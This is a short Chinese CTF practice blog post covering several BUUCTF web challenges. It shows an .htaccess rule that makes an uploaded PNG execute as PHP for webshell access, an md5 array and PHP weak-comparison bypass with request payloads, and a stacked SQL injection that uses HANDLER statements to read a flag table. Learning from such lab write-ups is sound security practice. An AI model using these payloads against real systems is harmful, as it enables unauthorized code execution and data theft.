BUUctf刷题第五天

每天坚持,绝对不能给自己找借口
加油!

[网鼎杯 2018]Fakebook

这题有一点ssrf,明天再看

[MRCTF2020]你传你🐎呢

.htaccess的文件上传
和上传.user.ini方式差不多
.htaceess的内容为

<FilesMatch "a.png">
SetHandler application/x-httpd-php
</FilesMatch>

解析一个a.png,当做php解析
再上传a.png即可
在这里插入图片描述
地址也给了蚁剑直接连
收工

[MRCTF2020]Ez_bypass

在这里插入图片描述

这道题就更简单了
首先绕过md5等于md5,参数还得不相同
用数组绕过,md5解析不了数组
false=false&id[]=1!=gg[]=2
大概就是这个意思
然后让passwd不等于数字还得等于1234567
用php弱比较1234567a即可
payload:
get:?id[]=1&gg[]=2
post:passwd=1234567a
flag就出来了

[GYCTF2020]Blacklist

是个sql注入,好像是堆叠注入
在这里插入图片描述
首先1’;show tables #
在这里插入图片描述

有过滤,老方法用不了了
这里我们用到handler这个东西
HANDLER … OPEN语句打开一个表,使其可以使用后续HANDLER … READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER … CLOSE或会话终止之前不会关闭
payload:

1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;#

大概懂这个意思了,我觉得能想出来这个的,真的nb

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值